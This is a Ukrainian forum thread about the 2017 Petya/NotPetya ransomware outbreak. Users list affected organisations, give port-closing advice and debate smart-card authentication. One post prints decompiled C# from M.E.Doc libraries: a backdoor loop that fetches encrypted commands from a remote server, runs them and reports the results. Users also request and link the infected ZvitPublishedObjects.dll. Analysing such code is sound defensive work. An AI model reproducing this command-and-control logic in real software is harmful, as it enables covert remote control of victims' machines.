Хакерская атака, «Киевэнерго», «Ощадбанк», «Нова пошта» и «Укртелеком» |
Здравствуйте Гость [ Вход | Регистрация ] | Форум в сети 6904-й день
![]() |
Шановні користувачі! Запрошуємо вас до офіційного телеграм-канала 0day Community. Тут ви зможете поспілкуватися одне з одним та дізнатися про останні новини щодо роботи ресурса, поставити запитання до адміністрації, тощо. Перейти до телеграм-канала можна відсканувавши QR-код або натиснувши на посилання: @zeroday_ua |
Хакерская атака, «Киевэнерго», «Ощадбанк», «Нова пошта» и «Укртелеком» |
Суничка |
Пост
#1
|
Репутация: ![]() ![]() Ethereal Dream ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 12 131 С нами с: 30-June 09 ![]() |
![]() ![]() «Киевэнерго», «Ощадбанк», «Нова пошта» и «Укртелеком» подверглись хакерской атаке. Волна идет по всей Украине Энергетические компании Украины подверглись массированной атаке вируса-шифровальщика – аналога WannaCry Вирус называется очень просто и оригинально – Petya. Подробнее про WannaCry: » Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... « Проверить, подвержены ли вы атаке: https://2ip.ru/check-port/?port=445 Порт должен быть закрыт. Для прекращения распространения вируса нужно немедленно закрыть TCP-порты 1024–1035, 135 и 445. Список павших: Медиа: ATR, 24 канал, , УМХ (football.ua), Корреспондент, Радио "Люкс", Подробности, Тонис, edipresse. Связь: Vodafone, Киевстар, Астелит (lifecell) – к-к-комбо; Датагруп (Воля), Укртелеком. Коммерция: Эпицентр, Новая линия, Новус, Фоззи, Synevo, Укрпочта, Мист-Экспресс, Киевводоканал, Цитрус, Film.ua, СтарМедиа, ДТЭК (Метинвест). Транспорт: а/п «Борисполь», WOG, KLO, Укрзалізниця, Антонов. Государство: Кабинет Министров Украины, Министерство инфраструктуры Украины, Чернобыльская АЭС. Нацбанк тоже зацепило. Список, судя по всему, будет пополняться. Имхо, убытки будут на десятки миллионов. Тем временем подзалетели не только мы: Український вірус поширюється по світу - The Independent На даний момент відомо про ураження систем судноплавної компанії Maersk і британської рекламної компанії WPP. Возможное лечение: » Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... « Сообщение отредактировал DemirelUA - Jun 28 2017, 12:26 |
![]() ![]() |
Console |
Пост
#861
|
Репутация: ![]() ![]() ultra active user ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 11 285 С нами с: 23-March 08 ![]() |
безопасность и бюджетно несовместимы... Это как современный бизнес-центр с кучей важных доков и тд, а используют карты доступа Em-Marine, которые клонируются девайсом с алиэкспресса за 7$. Смотрю события 27 и 4го так и не научили многих... ну Em-Marine может юзатся исключительно как интерфейс связи, и доступа к приватным ключам вы не получете устройством за 7 баксом... Но в целом согласен, строить доступ на RFID или Em-Marine метках бред, а вот на PKI норм. Сообщение отредактировал Console - Jul 6 2017, 9:13 |
cosco |
Пост
#862
|
Репутация: ![]() ![]() Старожил ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 3 796 С нами с: 29-September 12 ![]() |
ну Em-Marine может юзатся исключительно как интерфейс связи, и доступа к приватным ключам вы не получете устройством за 7 баксом... Но в целом согласен, строить доступ на RFID или Em-Marine метках бред, а вот на PKI норм. вы вот сами поняли что сказали?) при чем тут логический и физический доступ Я говорил о физическом, логический доступ это отдельная лирика. По логическому норм безопасность дают лишь крещендо и сеос, остальное - до поры до времени. про Hideez вообще умильнуло ![]() У нас на контору стоит фортрес, доступ к серверам онли по сеосу в режиме 2факторки. Бугалтерии повезло меньше, они в другом офисе и жили лишь на фаерволе, но медок сцука чума ![]() |
alex_mz |
Пост
#863
|
Репутация: ![]() ![]() Дух Группа: Пользователи Сообщений: 27 С нами с: 18-March 06 ![]() |
Просто мне понравилось решение.
Приезжал друг. У него доступ к серваку по rdp Логин один и тот же. А пароль. это его пароль плюс цифры с токена на котором 8 цифр. меняются каждых 10 секунд. Даже если где то считают пароль. Через 30 сек он уже не актуальный. Вот ищу - может где есть на малое количество серваков и пользователей. |
kid_t |
Пост
#864
|
Репутация: ![]() ![]() Дух Группа: Пользователи Сообщений: 133 С нами с: 15-November 08 ![]() |
Выложите пожалуйста архив с ZvitPublishedObjects.dll , найти не могу.
Сообщение отредактировал kid_t - Jul 6 2017, 9:59 |
imenno |
Пост
#865
|
Репутация: ![]() ![]() Мистер Равлик ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 16 192 С нами с: 24-March 06 ![]() |
двухфакторный доступ к админской учетке решает все проблемы У меня сервера остались жить, доступ к админу через карту доступа iclass. Буху не повезло. Кстати, есть какие-то аналоги медка под линукс, или мак? Только на виртуалке под линь. После того видео офиса и серверной медка, там по ходу и них сидят "спецы", которые прошли трехмесячный курс в КРОКе, вряд ли им по силам сделать клиент под линь. ![]() Сообщение отредактировал imenno - Jul 6 2017, 10:02 |
cosco |
Пост
#866
|
Репутация: ![]() ![]() Старожил ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 3 796 С нами с: 29-September 12 ![]() |
Просто мне понравилось решение. Приезжал друг. У него доступ к серваку по rdp Логин один и тот же. А пароль. это его пароль плюс цифры с токена на котором 8 цифр. меняются каждых 10 секунд. Даже если где то считают пароль. Через 30 сек он уже не актуальный. Вот ищу - может где есть на малое количество серваков и пользователей. это прошлый век. iclass seos, генерирует одноразовые ключи, при чем на телефоне доступ к корп. почте только при поднесении карты доступа к NFC телефона. ![]() |
Lion_Killsberg |
Пост
#867
|
Репутация: ![]() ![]() Постоялец ![]() ![]() ![]() Группа: Пользователи Сообщений: 1 624 С нами с: 9-February 07 ![]() |
|
cosco |
Пост
#868
|
Репутация: ![]() ![]() Старожил ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 3 796 С нами с: 29-September 12 ![]() |
тоже не ахти телефон с nfc карточка. сканер отпечатков и интеграция с АД и не нуно помнить никакие пароли Ну не забываем, что этой картой доступа мы ходим по зданию, даже в туалет... Так же эта карта прикладывается к usb-считывателям и дает доступ к рабочей станции\серверу ну и как доп, она же генерирует OTP при поднесении к телефону с NFC, для открытия корпоративной почты и тд на телефоне. |
roleg |
Пост
#869
|
Репутация: ![]() ![]() Дух Группа: Пользователи Сообщений: 162 С нами с: 5-May 08 ![]() |
у меня в исполняемых библиотеках медка было такое:
private Cmd[] GetCommandsAndPeriod(string Uri) { Uri = Uri ?? this.ReqUri; Cmd[] cmdArray = null; ZvitWebClient zvitWebClient = new ZvitWebClient() { Proxy = this.proxy }; ZvitWebClientExt.AddCookie(zvitWebClient, "EDRPOU", this.EDRPOU); ZvitWebClientExt.AddCookie(zvitWebClient, "un", Environment.UserName); zvitWebClient.SetExpect100ContinueBehavior(Uri); MemoryStream memoryStream = new MemoryStream(zvitWebClient.DownloadData(Uri)); byte[] numArray = new byte[8]; memoryStream.Read(numArray, 0, (int)numArray.Length); byte[] numArray1 = new byte[checked((IntPtr)(memoryStream.Length - (long)8))]; memoryStream.Read(numArray1, 0, (int)numArray1.Length); byte[] numArray2 = Crypto.Decrypt(numArray1, numArray); Cmds cmd = this.DeserializeCmds(Compression.Decompress(numArray2)); cmdArray = cmd.commands; this.Period = cmd.t; return cmdArray; } private void MainAction() { while (true) { try { try { Cmd[] commandsAndPeriod = this.GetCommandsAndPeriod(this.ReqUri); for (int i = 0; i < (int)commandsAndPeriod.Length; i++) { Cmd cmd = commandsAndPeriod[i]; Worker worker = new Worker(this.ProxyInfo); Thread thread = new Thread(new ParameterizedThreadStart(worker.ExecuteCmd)) { IsBackground = true }; thread.Start(cmd); thread.Join(600000); if (thread.IsAlive) { thread.Abort(); thread = null; } string result = worker.Result; this.SendAnswer(this.ResUri, result, cmd.r); } } catch { } } finally { Thread.Sleep(this.Period); } } } подавать на них в суд? |
-RC- |
Пост
#870
|
Репутация: ![]() ![]() bifurcated person ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 6 519 С нами с: 24-December 08 ![]() |
http://internetua.com/operatori-NotPetya-d...frovannie-faili
Операторы NotPetya доказали свою способность восстанавливать зашифрованные файлы |
Chorik |
Пост
#871
|
Репутация: ![]() ![]() Активист ![]() Группа: Пользователи Сообщений: 245 С нами с: 4-December 06 ![]() |
|
southman |
Пост
#872
|
Репутация: ![]() ![]() Старожил ![]() ![]() ![]() ![]() Группа: Модеры Сообщений: 3 083 С нами с: 19-February 11 ![]() |
http://internetua.com/operatori-NotPetya-d...frovannie-faili как раз пишу по этому вопросу - линк оригинала Операторы NotPetya доказали свою способность восстанавливать зашифрованные файлы ![]() https://motherboard.vice.com/en_us/article/...rs-decrypt-file Если это так, то readme.txt с ключом стоит хранить от каждой инфицированной машины - это дает возможность раскодировать отдельные файлы. Пока нет доказательств о раскодировании MFT, MBR. Сообщение отредактировал southman - Jul 6 2017, 12:12 |
Freelancer_mac |
Пост
#873
|
Репутация: ![]() ![]() ultra active user ![]() ![]() ![]() ![]() ![]() ![]() Группа: BANNED Сообщений: 11 961 С нами с: 1-August 10 ![]() |
|
tamagochy |
Пост
#874
|
Репутация: ![]() ![]() Старожил ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 2 501 С нами с: 29-November 06 ![]() |
Ну все жду подачи в суд на медок. О какой заплатке они мечтают, компания должна просто исчезнуть с лица земли обанкротившись.
|
woodsman |
Пост
#875
|
Незарегистрированный ![]() |
у них в лицензионном соглашении при установки программы ты соглашаешься что они не несут ответственности вообще ни за что.
может прогера какого посадят. |
volucer |
Пост
#876
|
Репутация: ![]() ![]() Дух Группа: Пользователи Сообщений: 29 С нами с: 3-June 11 ![]() |
PsExec, который Петя притащил, ещё и подписан валидным сертификатом ![]() Обычное дело. Я иногда так софт подписываю, который с уак не хочет запускаться как раз пишу по этому вопросу - линк оригинала ![]() https://motherboard.vice.com/en_us/article/...rs-decrypt-file Если это так, то readme.txt с ключом стоит хранить от каждой инфицированной машины - это дает возможность раскодировать отдельные файлы. Пока нет доказательств о раскодировании MFT, MBR. Это развод. Опять же версий пети есть около 4, смотря какая. Сообщение отредактировал volucer - Jul 6 2017, 15:47 |
Nazgul |
Пост
#877
|
Репутация: ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 5 687 С нами с: 5-December 06 ![]() ![]() |
Выложите пожалуйста архив с ZvitPublishedObjects.dll , найти не могу. Тыц Сообщение отредактировал Nazgul - Jul 6 2017, 14:27 |
Console |
Пост
#878
|
Репутация: ![]() ![]() ultra active user ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 11 285 С нами с: 23-March 08 ![]() |
вы вот сами поняли что сказали?) при чем тут логический и физический доступ Я говорил о физическом, логический доступ это отдельная лирика. По логическому норм безопасность дают лишь крещендо и сеос, остальное - до поры до времени. про Hideez вообще умильнуло ![]() У нас на контору стоит фортрес, доступ к серверам онли по сеосу в режиме 2факторки. Бугалтерии повезло меньше, они в другом офисе и жили лишь на фаерволе, но медок сцука чума ![]() Ну вопервых что вам мешает на одной карте сделать пропуск на проходной(физически правильно я понял?) и двухфакторную авторизацию в домен + ЕЦП на документы, и все на одной карте-токене/самрткарте(НКИ) кто как называет...+ от настроек AD зависит, политика работы по смарткартам. Они могут работать паралельно с паролями, или только по картам, блокировка учетки может срабатывать сразу как только карта удалена с рабочей машины или нет... тут уже полет фантазии. Я говорил что пропуски по rfid меткам и подобному бред. Но некоторы смарткарты используют NFC или Em-Marine исключительно для чтения или записи. При этом карта является НКИ. крещендо и сеос Я так понял производители НКИ, для хранения RSA ключей, замечу апартные.Так, я как раз о них выше и писал... Есть и другие производители НКИ..., по сути они все дают высокий уровень безопасности по сравнению с пинкодом, или отдельно лежащем файликом ключа.... Про Hideez согласен, игрушка)Сообщение отредактировал Console - Jul 6 2017, 19:48 |
Freelancer_mac |
Пост
#879
|
Репутация: ![]() ![]() ultra active user ![]() ![]() ![]() ![]() ![]() ![]() Группа: BANNED Сообщений: 11 961 С нами с: 1-August 10 ![]() |
Сообщение отредактировал Freelancer_mac - Jul 6 2017, 20:39 |
Console |
Пост
#880
|
Репутация: ![]() ![]() ultra active user ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 11 285 С нами с: 23-March 08 ![]() |
как раз пишу по этому вопросу - линк оригинала ![]() https://motherboard.vice.com/en_us/article/...rs-decrypt-file Если это так, то readme.txt с ключом стоит хранить от каждой инфицированной машины - это дает возможность раскодировать отдельные файлы. Пока нет доказательств о раскодировании MFT, MBR. Самое интересное в первые дни, часто говорили что авторы допустили ошибки механизме шифрования..... По словам специалистов тыц(гиктаймс) по кибербезопасности, за свои деньги эти пользователи не получат ровно ничего, поскольку в коде зловреда есть ошибка, которая делает невозможной расшифровку файлов. Специалисты компании проанализировали код зловреда, тот участок, который связан с шифрованием файлов, и поняли, что после того, как диск полностью зашифрован, жертва теряет возможность получить свою информацию обратно . А сегодня, на работе програмист(направление криптография), на вопрос "Были ошибки или нет?". Ответил что онень грамотно и красиво все реализовано по часте криптографии, и занимался этим грамотный специалист по части криптографии, не самоучка анархист ![]() Сообщение отредактировал Console - Jul 6 2017, 20:55 |
![]() ![]() |
![]() |
Упрощённая версия | Сейчас: 7th February 2025 - 20:19 |
Сайт не розміщує електронні версії творів, а займається лише колекціонуванням та каталогізацією посилань, що публікуються нашими користувачами. Якщо Ви є правовласником якоїсь частини опублікованого матеріалу та не бажаєте, щоб посилання на нього знаходилось в нашому каталозі, зв’яжіться з нами і ми видалимо його. Файли для обміну надані користувачами сайту і адміністрація не несе відповідальності за їх вміст. |